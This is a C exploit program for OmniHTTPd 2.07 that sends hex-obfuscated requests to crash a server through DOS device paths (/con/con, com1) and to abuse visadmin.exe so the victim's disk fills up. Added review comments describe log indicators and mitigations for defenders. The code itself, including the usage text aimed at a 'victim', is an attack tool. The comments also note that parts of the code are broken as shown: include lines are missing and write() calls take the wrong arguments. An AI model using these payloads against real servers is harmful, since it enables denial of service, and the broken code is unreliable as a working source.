/* tested on omnihttpd 2.07
 * this combines a shell script from sirius from buffer0vefl0w security
 * and a bugtraq report from Valentin Perelogin
 * except with actual code and combination of the two.
 * kilrid@berZerker.net
 * www.Hack-X.org
 *
 * NOTE(review): what this program puts on the wire, for log review and
 * signature writing. It opens one TCP connection to the host in argv[1]
 * on `port` and, depending on argv[2], writes one of:
 *   "crash"    - the bytes in concon[]   ("GET /con/con" + newline)
 *   "-d"       - a request naming a device (usage text gives com1)
 *   "visadmin" - the bytes in visadmin[]
 *                ("/cgi-bin/visadmin.exe?user=guest" + newline)
 * Indicators in server access logs are therefore request paths made of
 * reserved DOS device names (con, com1) and requests for
 * /cgi-bin/visadmin.exe with user=guest. The author's own comment below
 * says the visadmin case is believed to affect only versions prior to
 * 2.07; removing or access-restricting visadmin.exe and rejecting
 * device-name path components at the server or a front-end filter are
 * the corresponding mitigations.
 */
/* NOTE(review): the six header names below were lost when the page was
 * extracted (angle-bracket text stripped); as shown, these directives do
 * not compile. */
#include
#include
#include
#include
#include
#include
#define port 80 // target TCP port; change as needed
/* Receive buffer for the visadmin branch. File scope, so it starts
 * zero-filled. */
char buf[1024];
/* Hex-escaped request line; decodes to "GET /con/con\n". */
char concon[] = "\x47\x45\x54\x20" "\x2f\x63\x6f\x6e\x2f\x63\x6f\x6e\x0a";
/* Hex-escaped string; decodes to "/cgi-bin/visadmin.exe?user=guest\n". */
char visadmin[] = "\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x76\x69" "\x73\x61\x64\x6d\x69\x6e\x2e\x65\x78\x65\x3f" "\x75\x73\x65\x72\x3d\x67\x75\x65\x73\x74\x0a";
int sock;               /* connected socket descriptor */
struct hostent *hp;     /* resolver result for argv[1] */
struct sockaddr_in s;   /* destination address, filled from hp */
/*
 * Entry point. argv[1] is the host name, argv[2] selects the mode
 * ("crash", "-d", "visadmin"), argv[3] is the device name for "-d".
 * Exits with -1 on usage or resolution failure; otherwise falls off the
 * end of main without an explicit return.
 */
int main( int argc, char *argv[] ) {
    /* Only argv[1] is guaranteed by this check. argv[2] (and argv[3] in
     * the -d branch) are read later without any argc test, so running
     * with a host alone passes NULL to strcmp.
     * NOTE(review): the usage lines print the mode directly after the
     * program name, while the code reads the host from argv[1] and the
     * mode from argv[2]; a host placeholder was presumably stripped from
     * these strings during extraction - confirm against the original. */
    if(argc < 2) {
        printf("omnihttpdex - kilrid@berZerker.net\n");
        printf("usage(s)\n");
        printf("%s crash - crashes machine via /con/con\n",argv[0]);
        printf("%s -d -crashes remote device ex: -d com1\n",argv[0]);
        printf("%s -attempt to exploit visadmin.exe\n",argv[0]);
        exit( -1 );
    }
    hp=gethostbyname(argv[1]);
    if (!hp) {
        /* NOTE(review): gethostbyname reports failure through h_errno,
         * so the text perror appends here may be unrelated - confirm. */
        perror("Failed to resolve host");
        exit( -1 );
    } else {
        /* Copy the first resolved address into the destination struct. */
        bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
        s.sin_family=hp->h_addrtype;
        s.sin_port=htons(port);
        /* Failures of socket() and connect() are only reported with
         * perror; execution continues with an unusable descriptor. */
        if ((sock=socket(AF_INET,SOCK_STREAM,0))<0) perror("can't startup socket");
        if (connect(sock,(struct sockaddr *)&s,sizeof(s))) perror("problem:");
        usleep(100);
        /* Every write() below is called with four arguments, which does
         * not match the three-argument POSIX write(fd, buf, count); none
         * of the return values is checked, so "string sent." is printed
         * whether or not anything was transmitted. */
        if(!strcmp(argv[2], "crash")) {
            write(sock, concon,strlen(concon),0);
            printf("attempting to crash %s via /con/con\n",argv[1]);
            printf("string sent.\n");
        } else if(!strcmp(argv[2], "-d")) {
            /* The literal "GET /%s\n" is passed as the buffer and argv[3]
             * sits in the count position; no string formatting is
             * performed in this call. */
            write(sock, "GET /%s\n",argv[3],0);
            printf("attempting to kill %s on victim %s...\n",argv[3],argv[1]);
            printf("string sent.\n");
        } else if(!strcmp(argv[2], "visadmin")) { // this is only from versions prior to 2.07 I believe...
            write(sock, visadmin,strlen(visadmin),0);
            printf("requesting visadmin as guest to fill up victim's diskspace\n");
            /* recv's return value is ignored; a full 1024-byte read would
             * leave buf without a terminating NUL before the strcmp. */
            recv(sock, buf, sizeof(buf),0);
            /* The double negation is true whenever buf differs from the
             * one-character string " ", so any other response (or none)
             * takes the "no visadmin.exe here" path. That path exits
             * without reaching close(sock). */
            if(!(!strcmp(buf, " "))) {
                printf("no visadmin.exe here...\n");
                exit(-1);
            } else {
                printf("filling..\n");
                usleep(10000);
            }
        }
        close(sock);
    }
}